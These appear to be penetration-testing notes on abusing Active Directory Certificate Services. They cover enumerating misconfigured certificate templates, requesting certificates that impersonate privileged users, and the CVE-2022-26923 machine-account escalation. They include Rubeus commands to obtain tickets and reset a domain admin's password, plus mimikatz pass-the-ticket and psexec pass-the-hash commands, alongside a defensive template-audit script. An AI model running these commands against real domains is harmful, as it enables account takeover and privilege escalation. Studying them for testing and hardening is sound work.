## Active Directory Certificate Service (AD CS)

* Internal CA
* PKI
* File system encryption
* Digital signatures
* User authentication
* __Certificates are not revoked when the account password is reset__
## Certificate Templates

* Extended/Enhanced Key Usage (EKU)
* Certain combinations of template settings can be exploited
* User certificates may be requested by a member of the Domain Users group
* Machine certificates may be requested by a host in the Domain Computers group
### Enumeration

* [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)

```sh
certutil -v -template > ct.txt
```
Exploitable templates should have the following traits:

* `Allow Enroll` or `Allow Full Control` permissions to request a certificate
* Find the groups via `net user <username> /domain` --> `Domain Users`, `Domain Computers`
* A client authentication EKU for Kerberos authentication --> `Client Authentication`
* Permission to supply the subject alternative name (SAN, e.g. a UPN or URL) in the request; the SAN is what the Kerberos ticket is issued for --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
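As an added audit example (not from the original notes or from any of the tools linked here), the Python below encodes the three traits just listed as a check over template attributes, so a defender can flag templates that need hardening. The Client Authentication OID and the `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` bit are real values; the template records are constructed samples, and the manager-approval field is an extra mitigating check not mentioned above.

```python
from dataclasses import dataclass

# Real values: OID of the Client Authentication EKU and the bit that
# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT sets in msPKI-Certificate-Name-Flag.
CLIENT_AUTH_EKU = "1.3.6.1.5.5.7.3.2"
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001

# Groups the notes treat as low privilege (any domain user or host).
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users"}

@dataclass
class Template:
    name: str
    name_flags: int          # msPKI-Certificate-Name-Flag
    ekus: frozenset          # EKU OIDs allowed by the template
    enrollers: frozenset     # principals holding Enroll or Full Control
    manager_approval: bool   # CA manager approval required (mitigating)

def audit_template(t: Template) -> list:
    """Return the risky traits if all three combine; [] means no finding."""
    traits = []
    if t.enrollers & LOW_PRIV_PRINCIPALS:
        traits.append("low-privilege Enroll/Full Control")
    if CLIENT_AUTH_EKU in t.ekus:
        traits.append("Client Authentication EKU")
    if t.name_flags & ENROLLEE_SUPPLIES_SUBJECT:
        traits.append("CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT")
    # A single trait is normal; only the full combination without
    # manager approval lets an enrollee choose whom the certificate names.
    if len(traits) == 3 and not t.manager_approval:
        return traits
    return []

# Constructed sample templates, not output of a real CA.
SAMPLES = [
    Template("VulnTemplate", 0x1, frozenset({CLIENT_AUTH_EKU}), frozenset({"Domain Users"}), False),
    Template("User", 0x0, frozenset({CLIENT_AUTH_EKU}), frozenset({"Domain Users"}), False),
    Template("WebServer", 0x1, frozenset({"1.3.6.1.5.5.7.3.1"}), frozenset({"Domain Admins"}), False),
    Template("Approved", 0x1, frozenset({CLIENT_AUTH_EKU}), frozenset({"Domain Users"}), True),
]

def vulnerable_names(templates=SAMPLES) -> list:
    return [t.name for t in templates if audit_template(t)]

if __name__ == "__main__":
    for t in SAMPLES:
        print(t.name, audit_template(t) or "ok")
```

Feeding real template data into `Template` (for instance parsed from the `certutil -v -template` dump above) turns this into a quick pre-check before a fuller PSPKIAudit run.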
#### Certify

Finds information about all registered CAs. As a starting point, at least look at the vulnerable templates:

```sh
Certify.exe find /vulnerable
```
### Certificate Creation

* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (choose `Computer Account` when requesting from an administrative account)
* Then in the main menu, `Certificates` --> right click on `Personal` --> `All Tasks` --> `Request Certificates` --> `Next` --> `Next` --> `More information is required to enroll this certificate` --> `Common Name` --> `CN=concerto`, and `User Principal Name` set to the user to impersonate --> `OK` --> select `User Request` --> `Enroll`
* Then in the main menu, `Personal` --> `Certificates` --> __the certificate__
* Right click the certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save

An alternative is certipy-ad.
#### Certipy-AD

First `pip install certipy-ad`.

Take a look at the documentation provided in the [git repository's README](https://github.com/ly4k/Certipy?source=post_page-----c56f238991c0--------------------------------#esc7).

Since it is possible to issue certificates through a (Sub)CA directly if you have the right permissions on the CA itself, this is worth checking.

[Hacktricks' AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation) provides the details.
### Impersonation

Request a TGT with the created certificate.

#### On the target machine

```sh
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
```

Select a domain admin account by opening `Active Directory Users and Computers`, then change its password using the ticket:

```sh
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain controller> /targetuser:<domain>\<dauser>
```

* `runas /user:<domain>\<username of DA> cmd.exe`
* Alternatively, load the Rubeus outfile via mimikatz to authenticate as the impersonated user on a remote domain

```sh
privilege::debug
kerberos::ptt <name of file to write TGT to.kirbi>
exit
dir \\<domain>\<dir>$\
```
#### On the attacking machine

Use impacket's psexec:

```sh
psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
```
## CVE-2022-26923

* Aims at abusing the template configuration, specifically the Subject Alternative Name (`SAN`): set it to an account with higher permissions
* User and Machine certificate templates
    * User templates: the User Principal Name is used for the `SAN`; this template cannot be modified in a way that escalates privileges
    * Machine templates: the computer account's DNS name is used for the `SAN`
* Members of the Authenticated Users group can create 10 Machine Certificates
* __DNS hostname__ is used for authentication
* __Service Principal Names (SPN)__ associate a service logon with a service instance; SPNs are unique
* Permissions of interest; both are needed
    * Validated write to DNS hostname: allows updating the DNS hostname of the AD object associated with the host
    * Validated write to SPN: allows updating the SPN of the AD object associated with the host
### Usage

* A user account has to be compromised; use it to enrol a new host on the domain
* Alter the DNS hostname attribute of the AD object to that of a Domain Controller or another higher-privileged host
* Remove the SPN attribute to bypass the SPN uniqueness check
* Request the machine certificate with the default template
* Authenticate via Kerberos with the certificate as the higher-privileged machine